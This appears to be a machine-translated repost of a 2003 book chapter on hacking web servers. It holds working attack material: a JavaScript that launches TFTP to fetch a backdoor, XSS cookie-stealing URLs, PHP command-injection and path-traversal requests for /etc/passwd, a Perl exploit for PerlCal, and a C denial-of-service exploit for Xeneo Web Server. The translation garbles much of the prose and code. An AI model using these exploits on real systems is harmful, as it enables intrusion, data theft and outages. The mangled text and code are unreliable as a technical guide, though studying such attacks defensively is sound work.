Discussing this chapter is the most common attack we know. Hackers use the Web's weaknesses, these few or hardly get control. The most common Web service weakness is not only in Microsoft Internet Information Server (IIS), but also there is a web service, Apache, and other web services with Sun ONE JAVA.
Hackers will study things in most commonly used Web services, want to find remote available vulnerabilities to get root or fully login privileges. The reason is because, when you find a remote available bug, you can make hackers can use malicious code on hosts that are not tens of thousands of machines.
The evolution of the web application
In today's Internet environment, it is a mixture of different technologies, protocols and operating systems dispersed in global. By using this mixer, this may cause the application to communicate with each other.
Web applications have an unusual potential for users and developers, but they can also become a nightmare for security and system management, most of the web services encodes a certain existing security executive, and supports some applications as a structure. Also not independently and its own platform. Most offers and other developers write code to configure and apply Web services. This is why so many vulnerabilities can be found in these codes, which makes customers and system users under attack.
Most web applications are continuous with more functionality and allocation of more scaling features, which adds a lot of potential vulnerabilities in the code. The company expects to use the formation technology to achieve competitive advantages, but they should be able to have a security expert to view these code before the product is sold to the public. This will help to avoid the possibility of hackers to find remote or local vulnerability bugs in applications. Most web attacks are at the application of the app. Hackers don't need extensive knowledge to get logging in to local networks or a separate system
Table See 1-1; this is a small typical Web application technology total
Table 1-1 web application technologies Table 1-1 Web Application Technologies Software Technology Vendor TechnologiesSun Microsystems Java 2 Enterprise EditionBEA WeblogicIBM WebsphereMicrosoft javascript, ASP.NET, ISAPI, Common Object Model (COM), Active Server Pages (JSP) Apache Jakarta ( Server-Site Java) and phpGeneric HTML, Perl and CGI
Evolution of Web Development
With the development of web applications, Web development has also been long-term development. From a very basic directory table to remotely available buffer overflow, many companies work hard to find the security code they can do, but hackers are also Constantly looking for new, more complex methods to find bugs and use their way
Malicious object: Java / ActiveX Objects
Java and JavaScript
Java Objects or Applets is a small app written on the Sun micro system, and Java is an object-oriented language. It can treat all the elements as object processing, Java encoding, and wind in a file called .class, this file is stored in the web server, when in another language web client, its code will not be Give way. Java is one of the most advantageous INTERNET development tools today. Java provides developers with portable code, developers' development can be executed via Web.
In addition, hacker is targeting a way to use JavaScript, JavaScript is a scripting language, which can be applied in many server segments and client applications.
JavaScript is mainly used to accept user input and bundle other components together. The most important web browser built an JavaScript engine, which can accept these unformatted JavaScript text code and translate burst in the customer segment. Below is a very basic JavaScript example, it shows the Popup BoxExample: JavaScript popup box when a button is clicked
1 2
3
Basic JavaScript Example </ title> 4 <script language = javascript> 5 <! - hide for javascript challenged browsers67function popup1 () 8 {9 10 Alert ("Hello World!" ); 1112} 1314 </ script> 15 </ head> 16 <h1 align = center> Basic JavaScript Example </ h1> 17 <div align = center> 18 <form> 19 <input type = "Button" value = " Hello World! "Οnclick =" Popup1 ()> 20 </ form></p>
<p>The above example is to make you familiar with this language, and let you know how you should know when web is black.</p>
<p>Because JavaScript is executed on the client, a hacker can cause application to output sensitive information by entering non-standard data that can be executed or causes the application to crash.</p>
<p>Below is an example of a malicious JavaScript, JavaScript will perform TFTP.exe on the client's local machine.</p>
<p>EXAMPLE: Execute TFTP Client</p>
<p>21 <html> 22 <head> 2324 <title> Execute tftp.exe </ title> 25 <script language = javascript "> 26 <- hide for javascript challenged browsers2728var popup1 = window.createPopup ();! 2930function popup2 () 31 {3233 var popUpBody = popup2.document.body; 34 popUpBody.innterHTML = '<OBJECT NAME = "X" 35 CLASSID = CLSID: 11111111-1111-1111-1111-111111111111 "36 CODEBASE =" C: / Windows / system32 / TFTP.exe "> 37 </ Object> '; 38 popup2.show (390, 290, 300, 300, document.body); 3940} 4142 </ script> 4344 <p οnclick = OpenPopup2 ();> <u> <fontcolor = # bbbbb> TFTP </ font> </ u> </ p></p>
<p>By the following code, the TFTP (TRIVIAL TRANSFER FILE Protocol) client is turned on when you click the "TFTP" connection. Once the TFTP passes, the TFTP client can download some malicious code, such as a latter, so that hackers can get full login system permissions.</p>
<p>ActiveX</p>
<p>Microsoft has invented his own client script mode, which is often referred to as ActiveX. ActiveX is another by-product called COM and OLE technology. Not like JavaScript, ActiveX has permission to log in to the operating system, which is why Microsoft develops a registration system, so that the views of the household can be identified and executing his previously authorized to a ActiveX control typical web application cross-region Script Cross-Site Scripting Cross-Area Script Attack is one of the most common security issues today. Today, most of the Web sites contain a lot of dynamic directories, so that the site looks more suitable for users. Web applications are used to complete and distribute different types of output to users, depending on the settings of the web browser. Dynamic Web site has no threats, which are called "cross-region scripts" when a web application collects sensitive or malicious data from the client, which is a cross-regional script attack. Typically, these data is included in a form that contains malicious code in a super connection inside, hackers can use the user to click on a malicious connection to an email. Time message, forum post or a web site. Once the data collected from the web application, it will generate a page that is sent to it to users, but gives him a valid content from the correct site to some extent.</p>
<p>An instance of a cross-regional script attack If a web site or a web server, no script code is detected and send it back to the user's browser, which is when a fatal destruction is generated. Hackers can use the weaknesses of cross-regional scripts to get a user's cookies, login detailed list and other sensitive information. Several products have been attacked across regional script, which allow hackers to use Java Servlet containers to send back malicious JavaScript code. This allows hackers to construct cross-regional script attacks, under users who want to receive malicious script code from trusted servers is a number of old easily received a cross-regional script attack on Web server resin 1.2.2: http://www.targeted_host /<script>lert (Documents.cookie )</script>.jsp</p>
<p>WebSphere 3.02: http://www.targeted_host/ <script> alert (Documents.cookie) </ script> .jsp</p>
<p>JRUN 3.0: http://www.targeted_host/ <script> alert (Documents.cookie) </ script> .shtml</p>
<p>THESE PAGES WILL PRODUCE The FOLLOWING OUTPUT:</p>
<p>Message: file: file: // stacktrace: com.ibm.Servlet.Engine.Webapp.WebapPerReport: File Not Found: file: // ****** At javax.servlet.servletException. <Init> (servletexception .java: 107) At com.ibm.Websphere.Servlet.Error.ServleTerrorReport. <init> (servleterReport.java: 31) at com.ibm.servlet.Engine.Webapp.WebapPerReport. <init> (WebApperReport.java: 20 ) at com.ibm.servlet.EnGine.Webapp.WebappdispatcherResponse.senderror (WebAppdispatcherResponse.java: 97)</p>
<p>Coolkie is manipulated Cookie operation is a form of attack, this attack, hacker can modify special data between client and web applications, without intentional direct storage. This form of attack can be done with URL strings, cookies and table areas. This form of attack is the Man-in-Middle attack that everyone knows. Cookies is mainly used to facilitate storage user data and parameters and contain markers. Most cookies can be modified by users, and they can send back to the server with a different address request. Have a completely free tool to complete these tasks. Cookie is operated by the aspects of the cookies. Most cookies are used in Most Cookies Are Used for Session tokens to a Range of Arrays That Make Authentication Decisions.</p>
<p>About 90% of cookies are based on 64-bit encoding, the following is a basic, when a browser accepts an example of an HTTP header. EXAMPLE: SET-COOKIE</p>
<p>Set-cookie: VaruserName = c0nnie; & varuserid = TF7044959 Expires = THU, 19 JULY 2010 20:00:00 gmt; Path = /; domain = .security-protocols.com</p>
<p>The browser will explain these as a command and save it to this page. So, no matter when, support from the server requests a page, it will contain the following as the cookie of additional data to prevent the head of HTTP. Here is an example of an HTTP header, which is sent back by the web application when the user has already logged in.</p>
<p>Cookie: VaruserName = c0nnie; & varuserid = TF7044959</p>
<p>Just like you can see from this example, cookie is used to keep our login ID record. This is a good way - often of all your cookies from the reason why your local machine is removed. Cookie is a form of format text based on the send back to the server. It is clear that it should be easier to change. So you want to think, by manipulating a cookie, what a hacker can get.</p>
<p>Examples of cookies are very straightforward and easy to use, just like you can see, the user ID value is what we should try and change. Once I change its value, and I will get "Welcome Phil" messages from the new landing to the server. It seems like we have stored the login and use of another user. So, I am gambling, you are surprised why the web application knows the user's ID of the TF7044959 is phil? Our site, phil is not logged in, so it must have been stored in the system as a database.</p>
<p>Find loopholes can take advantage of the skills Techniques for Finding and Exploiting VulnerabilitiesWeb servers have always been the easiest way for a hacker to get into a internal network, or just to compromise systems exposed on the Internet. As we were saying in the beginning of this chapter , web applications are normally coded as fast as possible and the thought of coding securely never enters the mind of the programmers. They are numerous ways of finding vulnerabilities in web servers. in the next few sections will have examples of common fingerprints which are used in Exploitation of Both Web Servers and Web Applications.basic Exploitation Techniques</p>
<p>'<?' Method</p>
<p>The '<?' Method Can Be Used to Insert PHP INTO A Remote Web Application. It is Possible to Execute Arbitrary Commands On A Remote Server Using this Technique. Below Is An Example On How IT Can Be Used.</p>
<p>EXAMPLE: <?</p>
<p>http: //target_host/webapp.php= <? passthru ("id");?>></p>
<p>ON Some PHP Applications, this May Allow The Command To Be Executed Locally on The Remote Host Under The User The Web Server Is Running As.</p>
<p>';' Method</p>
<p>The ';' Character Allows Multiple Commands To Be Executed on a Unix or Linux Machines.</p>
<p>EXAMPLE: ';'</p>
<p>[root @ c0nnie] # id; uname -a uid = 0 (root) gid = 0 (root) groups = 0 (root) Linux c0nnie 2.4.19-16mdk # 1 fri Sep 20 18:15:05 CEST 2002 I686 Unknown UNKNOWN GNU / Linux</p>
<p>This Technique Is Offense.</p>
<p>'|' Method</p>
<p>The Pipe Character is Offense.</p>
<p>EXAMPLE: '|'</p>
<p>http: //target_host/foobar.pl? Page = .. / .. / .. / .. / bin / ls% 20-AL% 20 / Home |</p>
<p>The Following Request Will Give A Full Directory Listing of The 'Home' Directory on The Targeted Host. '% 00' Method</p>
<p>.</p>
<p>EXAMPLE: '% 00'</p>
<p>http://target_host/foobar.pl? Page = .. / .. / .. / .. / etc / passwd</p>
<p>BY MAKING THIS Request, The Web Application Will Disallow this Request Because It is checking for a valid file name like .asp, .html or any other type of file extension.</p>
<p>http: //target_host/foobar.pl? Page = .. / .. / .. / etc / passwd% 00HTML</p>
<p>NOW with this request, IT Tricks the Web Application Into Thinking That The FileName Ends in One of Its File Types. This is a Very Common Problem in Web Applications.</p>
<p>'% 20' Method</p>
<p>.</p>
<p>EXAMPLE: '% 20'</p>
<p>http: //target_host/foobar.pl? Page = Uname% 20-A |</p>
<p>The following example above will output the 'uname -a' command on a UNIX or Linux system. This may allow for an attacker to see what type of operating system the host is running. Or, this method can be used with other types of variations Of Choice.</p>
<p>Directory Traversal VulneRabilities</p>
<p>A directory traversal is when a web application and or web server does not filter out bad characters which are sent by a hacker. A hacker can send a bad request resulting in the disclosure of directories and files outside the normal bounding HTTP root directory.</p>
<p>Perlcal Cal_make.pl Directory Traversal</p>
<p>Back in April 2001 a guy by the name of Stan aka The Pike found a directory traversal in PerlCal cal_make.pl. PerCal is a web scheduler / calendar server which is managed by CGI scripts. This particular vulnerability allows anyone to download any file on the Local system. Below is an esample http request to do sol.example: 'cal_makel.pl'</p>
<p>http: // target_host / / /ci-bin/cal_make.pl?p0=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ ../etc/passwd�</p>
<p>The following request will retrieve the local system passwd which contains all the user accounts on system. Now if this is an older system, the passwd may not be shadowed making it easy to crack. I coded a very simple exploit for this vulnerability below.</p>
<p>Perlcal Cal_make.pl Exploit</p>
<p>1 #! / Usr / bin / perl2 # Perlcal Cal_make.pl Directory Traversal 3 # this Vuln Was Found by: Stan Aka Thepike4 # 5 # Vulnerable Systems: 6 # Perlcal Version 2.95 and prior (UNIX) 7 # 8 # Written by Tommy <Tommy@security-protocols.com> 9 # for security-protocols research labs10 # 09/09/0211 # 12 # usage: 13 # perl sp-perlcal.pl targeted_host / etc / passwd or / proc / version 14 # 15 # 16 ################# 1718Use IO :: Socket; 19Use Strict; 2021Print "-" x74; 22print "/ nperlcal cal_make.pl Directory Traversal, Tommy/@security-protocols.com / N "; 23PRINT" - "x74; 24print" / n / n "; 2526my $ host = $ argv [0]; 27my $ port = 80; 28my $ fuxor =" / etc / passwd% 00 "; 29my $ lin 30my @thedata; 3132 ($ ARGV [1]) && ($ fuxor = $ argv [1]. "% 00"); 3334Print "W0RKING ON GETTING $ fuxor from $ host / n"; 3536my $ tcpval = getProtobyname 'TCP'); 37my $ serverip = inet_aton ($ host); 38my $ serveraddr = SockAddr_in (80, $ serverip); 39my $ protocol_name = "tcp"; 4041my $ Iaddr = inet_aton ($ host) || Die Print (" Host Was Not Found: $ Host "); 42my $ Paddr = SockAddr_in ($ Port, $ Iaddr) || D IE Print ("You Did Something Wrong Stupid ... EXITING ..."); 43my $ proto = getProtobyname ('TCP') || Die Print ("Cannot Get Protocol"); 44Socket (Sock, PF_INET, SOCK_STREAM, $ Proto || Die Print ("Socket Could Not Open: $!"); 45connect (Sock, $ Paddr) || Die Print ("Cannot CONNECT: $!"); 4647my $ submit = "Get / CGI-BIN / Cal_make.pl?p0=../../../../../..fuxor/NN "; 48send (SOCK, $ SUBMIT, 0); 49 @ theseData = <sock>; 5051close (sock); 5253Foreach $ Lin (@thedata) 54 {55Print "$ lin"; 56} 5758print "</p>
<p>/ N --------------------------------------------------------- EOF ------------ ---------------------- / N / N "; Web Server and Web Application Vulnerability Scanning Software</p>
<p>We present this in section some tools which can be used to identify web server software vulnerabilities. We have used, and evaluated almost all web server vulnerability scanners and the following seem to be the best to use.</p>
<p>Nikto</p>
<p>Nikto is a web server vulnerability scanner written by Chris Sullo. Nikto performs comprehensive testing against web servers for multiple vulns including misconfigurations, insecure or default files and scripts and over 130 versions of servers. We feel that this is the best available free web server scanner Out There. Nikto Uses RFP's Lib WHINKER AS A BASE for All Socket Functionality. Some of Nikto's Main Features Are; Multiple IDs Invasion Techniques, SSL Support, and Perl Plug-in Support.</p>
<p>Nikto has so many checks, and can scan so fast that it will overwhelm smaller web servers, and will defiantly be seen in intrusion detection logs and web server logs. There is an IDS invasion option which can be used. The best thing about this tool Is that you code your ows ows.</p>
<p>WHINKER</p>
<p>Well the much long anticipated version 2.1 of Whisker has been released. Whisker is a very robust scanning tool. The main function of Whisker is to scan web server for files on remote web servers. Whisker was introduced in the earlier days when most bugs were associated with CGI scripts that had known vulnerabilities that could be exploited. Below we will demonstrate this by showing you how Whisker works. Please note that Whisker is a Perl script, so make sure you have Perl installed.</p>
<p>Whisker comes with a set of database files which the scan engine takes as its primary configuration file. The included database files tell Whisker what directories to look for, what files to look for and a few other things like how web servers react to certain requests. Here Is How To Run WHISKER AGAINST A Host: [TF0NE @ c0nnie tf0ne] $ perl -h http://target_host.com/</p>
<p>-------------------------------------------------- ---------------------</p>
<p>Title: Notice</p>
<p>Whisker scans for CGIs by checking to see if the server says a particular URL exists However, just because a URL exists does not necessarily mean it is vulnerable / exploitable -. The vulnerability might be limited to only a certain version of the CGI, and . the server might not be using the vulnerable version There is also the case where many scripts use the same generic CGI name (like count.cgi); in this case, the exact CGI being used may not be the same one that contains the vulnerability .</p>
<p>Thus, the actual vulnerability of the CGI must be verified in order to get a true assessment of risk. Whisker only helps in pointing out the problem areas. The next step after scanning with whisker is to review each found CGI by reviewing the reference URLs or Searching for the cgi name on securityfocus.com or google.com.</p>
<p>-------------------------------------------------- ---------------------</p>
<p>Beginning Scan Against http://www.target_host.com</p>
<p>-------------------------------------------------- --------------------</p>
<p>WHINKER IS CURRENTLY CRAWLING THE Website; please be patient.</p>
<p>-------------------------------------------------- ---------------------</p>
<p>Title: Server Bannerid: 100seVerity: Informational</p>
<p>The Server Returned The Following Banner: Microsoft-IIS / 5.0</p>
<p>-------------------------------------------------- -------------------- WHINKER IS DONE CRAWLING THE Website. ---------------------- -------------------------------------------------</p>
<p>Title: Server Bannerid: 100seVerity: Informational</p>
<p>The Server Returned The Following Banner: Microsoft-IIS / 5.0</p>
<p>-------------------------------------------------- ---------------------</p>
<p>Title: Server Options Resultsid: 109severity: InformationAl</p>
<p>The server responded to an OPTIONS query with the following public methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOC, UNLOCK, SEARCHThe allowed methods for '/' are: Options, TRACE, PUT, POST, COPY, MOVE, MKCOL, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH</p>
<p>-------------------------------------------------- ---------------------</p>
<p>Title: Server Patch LevelID: 111severity: Informational</p>
<p>Testing Indicates Server Patch Level To Be At OR AFTER THE FOLLOWING LEVEL: Win2k IIS-SRP1 (MS02-018) OR SP3</p>
<p>-------------------------------------------------- ---------------------</p>
<p>Title: viewcode.aspid: 621bid: 167cve: 1999-0736Found Url: /sites/samples/knowledge/membership/inspired/viewcode.asp</p>
<p>No Specific Information IS Provided For this item.</p>
<p>References: http://online.securityfocus.com/bid/167http: //cve.mitre.org/cgi-bin/cVename.cgi? Name = 1999-0736</p>
<p>-------------------------------------------------- ---------------------</p>
<p>Title: viewcode.aspid: 622bid: 167cve: 1999-0736Found url: /sites/samples/knowledtuture/ViewCode.asp</p>
<p>NO specific information is provided for this item.references: http: //online.securityfocus.com/bid/167http://cve.mitre.org/cgi-bin/cvel.cgi? Name = 1999-0736</p>
<p>-------------------------------------------------- --------------------- Title: viewcode.aspid: 624bid: 167cve: 1999-0736Found Url: /sites/sample/knowledge/push/viewcode.asp</p>
<p>No Specific Information IS Provided For this item.</p>
<p>References: http://online.securityfocus.com/bid/167http: //cve.mitre.org/cgi-bin/cVename.cgi? Name = 1999-0736</p>
<p>-------------------------------------------------- ---------------------</p>
<p>Title: viewcode.aspid: 627found url: /siteserver/publishing/viewcode.asp</p>
<p>No Specific Information IS Provided For this item.</p>
<p>-------------------------------------------------- ---------------------</p>
<p>Title: Encountered CookiesseVerity: Informational</p>
<p>The Following Cookies Were Encountered While Scanning: Aspsessionidscqaddsa = PokeccccjfeMDBHMKLFIG; PATH = /</p>
<p>-------------------------------------------------- ---------------------</p>
<p>WHINKER Scan Completed in 1 minute.</p>
<p>After looking over the output, Whisker has found several exploitable files and directories on this Microsoft IIS 5.0 system potentially. The nice thing about Whisker 2.1 is that it provides URL links, and detailed information of the files it has found. Whisker is a very powerful .</p>
<p>Shadow Security Scanner</p>
<p>One of the newer and very impressive vulnerability scanners is Shadow Security Scanner by Safety Lab. This is not just a web server scanner, but a full fledged vulnerability scanner. The latest version as of this writing is SSS 5.41.</p>
<p>Shadow Security Scanner was designed to identify known vulnerabilities, with suggest fixes to identified vulnerabilities, and also reports other security holes within the network. Shadow Security Scanner has very flexible policies on which audits to perform. There is a nice policy wizard which helps you specifically SELECT Which Ports you wish to scan.figure1-1 shadow security scanner</p>
<p>The reports that are produced after a scan are very detailed which makes it easy for any user to read, and act on found vulnerabilities within there network. Shadow Security Scanner has a very nice auto-update feature which allows you too update the scan modules on A Daily Basis. All though, this Tool Is Not Free It Is DEFIANTLY WORTH A Try if you are looking for a Robust TOOL.</p>
<p>Blindly Fuzzing Web Servers for VulneRabilities</p>
<p>I have had allot of success with fuzzing web servers and other applications for bugs. There are a few really good fuzzier tools out there. From my experience, SPIKE which was written by Dave Aitel has found numerous remotely exploitable bugs.</p>
<p>Spike</p>
<p>Spike is an API and a key test tool for you to quickly create a network protocol, Spike will make the replica of any complex binary protocol. The coolest thing is that you can test old technologies on new products, a web application for most, Spike can quickly discover buffer overflow, SQL INJECTION BUGS and FORMAT STRING BUGS. I found this very useful perl scripts SPIKE 'framework has many advantages, there are many advantages to using SPIKE's framework over using Perl scripts. SPIKE integrates very well with libntlm and other GPL'ed libraries for doing encryption and or other types of things that you do not Have perl modules.</p>
<p>Spike Programs for Web Applications</p>
<p>· Generic_web_server_fuzz · closed_source_web_server_fuzzer · WebFuzz.c · Webmitm · NTLM2 / NTLM_BRUTE</p>
<p>Below I will show you how to run SPIKE using the closed_source_web_server_fuzz program against Xeneo Web Server 2.2.2.10.0. Lets see what we find! [Tf0ne @ c0nnie src] $ ./closed_source_web_server_fuzz 192.168.1.103 80 GET / index .html 0 0</p>
<p>After about an hour of fuzzing, the closed_source_web_server_fuzz program segfaulted (meaning that it found a bug) After looking over the output from SPIKE, I found that the following GET request crashed the web server.:</p>
<p>Get /index.html?testvariable=gif http / 1.1referer: http: // localhost / %%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Content-Type: Application / X- www-form-urlencodedConnection: Keep-AliveCookie: VARIABLE = SPLABS; path = / User-Agent: Mozilla / 4.76 [en] (X11; U; Linux 2.4.2-2 i686) Variable: resultHost: localhostContent-length: 513Accept: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, image / pngAccept-Encoding: gzipAccept-Language: enAccept-Charset: iso-8859-1, *, utf-8whatyoutyped = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA now, we are a malicious package, we can easily write exploit code, following the development of such a regeneration loophole</p>
<p>Xneo Web Server 2.2.2.2.0.0 DOS EXPLOIT</p>
<p>59 / * XENEO Web Server 2.2.2.10.0 DOS 60 * 61 * Vulnerable Systems: 62 * XENEO Web Server 2.2.10.063 * Vendor: 64 * http://www.northernsolutions.com65 * 66 * Written and Found by Tommy < Tommy@security-protocols.com> 67 * for sp research labs68 * 04/23/200369 * 70 * www.security-protocols.com71 * 72 * usage: 73 * sp-xneo2 <targetip> [targetport] (Default IS 80 74 * / 757677 # include <winsock2.h> 78 # include <stdio.h> 7980 # pragma comment (lib, "ws2_32.lib") 8182char expens [] = 8384 "Get /Index.html?testvariable=&nextTestVariable= GIF http / 1.1 / r / n "85" referer: http: // localhost / %%%%%%%%%%%%%%%%%%%%%% %%% "86" %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% "87" %%%%%%%%%%%%%%%%%%%%%%%%%%%% "88" %%%%%%%%%%%%%%%%%%%%%%%%%%%% "89" %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% "90" %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%% "91" %%%%%%%%%) %%%%%%%%%%%%%%%%%%%%%%%%%%% "92" %%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%% "93" %%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%% "94" %%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%% / R / N "95" Content-Type: Application / X-WWW-Form-Urlencoded / R / N "96" Connection: Keep-alive / r / n "97" cookie: variable = splabs; path = // r / n "98" User-agent: mozilla / 4.76 [en] (x11; u; linux 2.4.2-2 i686) / R / N "99" VARIABLE: Result / R / N "100" host: localhost / r / n "101" Content-Length: 513 / R / N "102" Accept: image / gif, image / x-xbitmap, Image / jpeg, image / pjpeg, image / png / r / n "103" accept-encoding: gzip / r / n "104" accept-language: EN / R / N "105" accept-charset: ISO-8859- 1, *, UTF-8 / R / N / R / N / R / N "106" WhatYOoutyped =</p>
<p>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA "107" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA "108" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA "109" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA "110" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA "111" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA "112" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA "113" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA "114" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA "115" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA / r / n "; 116117int main (int argc, char * argv []) 118 {119WSADATA wsaData; 120WORD wVersionRequested; 121struct hostent * pTarget; 122struct sockaddr_in sock; 123char * target, buffer [30000]; 124int port, bufsize; 125SOCKET mysocket; 126127if (argc <2) 128 {129printf ( " XENEO Web Server 2.2.0.0 DOS / R / N <Tommy@security-protocols.com> / r / n / r / n "); 130Printf (" Tool usage: / r / n% s <targetip> [targetport] DEFAULT IS 80) / R / N / R / N "); 131Printf (" www.security-protocols.com/r/n/r/n "); 1 32exit (1); 133} 134135wVersionRequested = MAKEWORD (1, 1); 136if (WSAStartup (wVersionRequested, & wsaData) <0) return -1; 137138target = argv [1]; 139140 // for default web attacks141port = 80; 142143if ( Argc> = 3) Port = ATOI (Argv [2]); 144bufsize = 512; 145IF (Argc> = 4) buffsize = ATOI (Argv [3]); 146147Mysocket = Socket (AF_INET, SOCK_STREAM, 0); 148IF (MySocket == invalid_socket) 149 {150Printf ("socket error! / R / n"); 151EXIT (1); 152} 153154Printf ("resolving hostnames ... / n"); 155IF ((ptarget = gethostbyname (target)) = = NULL) 156 {157Printf ("</p>
<p>Resolve of% s failed / n ", argv [1]); 158EXIT (1); 159} 160161memcpy (& Sock.sin_addr.s_addr, ptarget-> h_addr, ptarget-> h_length); 162 Sock.sin_Family = AF_INET; 163 Sock.SIN_PORT = HTONS ((Ushort) Port); 164165Printf ("Connecting ... / N"); 166IF ((Connect (mysocket, (Struct SockAddr *) & Sock, Sizeof (Sock))) 167 {168Printf ("COULDN ' Connect to host./n" );169exit(1 ); 170 }171172printf ("in" 113Printf ("extenning payload ... / n"); 174IF (SEND (MySocket, Exploit, SizeOf (Exploit) -1, 0) == -1) 175 {176Printf ("Error Sending The Exploit PayLoad / R / N"); 177closeSocket (MySocket); 178Exit (1); 179} 180181Printf ("Remote Webserver Has Been Dos'ed / r / n "); 182CloseSocket (MySocket); 183wsacleanup (); 184 Return 0; 185} You can compile this vulnerability with Microsoft Visual Studio 6.0.</p>
<p>Summary</p>
<p>In this chapter, we have learned a lot of scanning and finding a loophole and discovering a way to find weaknesses in the web server. This is very important. Timely play the seller's security patches, close some of the features on the web server, often sweeping Out your own network vulnerability.</p>
<p>bibliography</p>
<p>Security URL</p>
<p>Http://security-protocols.comhttp: //eeye.com Http: //packetstormsecurity.nlhttp://astalavista.com</p>
<p>Scanning tool</p>
<p>Niktohttp: //www.cirt.net/code/nikto.shtmlwhisker http://www.wiretrip.net/rfp/shadow security scanner http://www.safety-lab.com</p>
<p>Blurry tool</p>
<p>Spikehttp://www.immunitysec.com/spike.html</p>
<p>Badpack3tbadpack3t@security-protocols.comwww.security-protocols.com</p>
<p>Copyright © 2000-2003 Security-Protocols Inc. All Trademarks Are Property of Their Respect For Entertainment Purposes ONLY ONLY.</p></div><div class="text-center mt-3 text-grey">
转载请注明原文地址:https://www.9cbs.com/read-86016.html</div><div class="plugin d-flex justify-content-center mt-3"></div><hr><div class="row"><div class="col-lg-12 text-muted mt-2"><i class="icon-tags mr-2"></i><span class="badge border border-secondary mr-2"><h2 class="h6 mb-0 small"><a class="text-secondary" href="tag-2.html">9cbs</a></h2></span></div></div></div></div><div class="card card-postlist border-white shadow"><div class="card-body"><div class="card-title"><div class="d-flex justify-content-between"><div><b>New Post</b>(<span class="posts">0</span>)
</div><div></div></div></div><ul class="postlist list-unstyled">
</ul></div></div><div class="d-none threadlist"><input type="checkbox" name="modtid" value="86016" checked /></div></div></div></div></div><footer class="text-muted small bg-dark py-4 mt-3" id="footer"><div class="container"><div class="row"><div class="col">CopyRight © 2020 All Rights Reserved
</div><div class="col text-right">Processed:
<b>0.048</b>, SQL:
<b>9</b></div></div></div></footer><script src="./lang/en-us/lang.js?2.2.0"></script><script src="view/js/jquery.min.js?2.2.0"></script><script src="view/js/popper.min.js?2.2.0"></script><script src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script>
var debug = DEBUG = 0;
var url_rewrite_on = 1;
var url_path = './';
var forumarr = {"1":"Tech"};
var fid = 1;
var uid = 0;
var gid = 0;
xn.options.water_image_url = 'view/img/water-small.png';
</script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script>
var forum_url = 'list-1.html';
var safe_token = 'uW4ghIfk1mrPdWpxW_2BcQvhSk_2FhKJBlxFo9uzsP8AhV_2FWZd37aIxYWRWPkIx3AhKJ0Fh4d7o_2BMo_2BF60X1uB_2FmWQ_3D_3D';
var body = $('body');
body.on('submit', '#form', function() {
var jthis = $(this);
var jsubmit = jthis.find('#submit');
jthis.reset();
jsubmit.button('loading');
var postdata = jthis.serializeObject();
$.xpost(jthis.attr('action'), postdata, function(code, message) {
if(code == 0) {
location.reload();
} else {
$.alert(message);
jsubmit.button('reset');
}
});
return false;
});
function resize_image() {
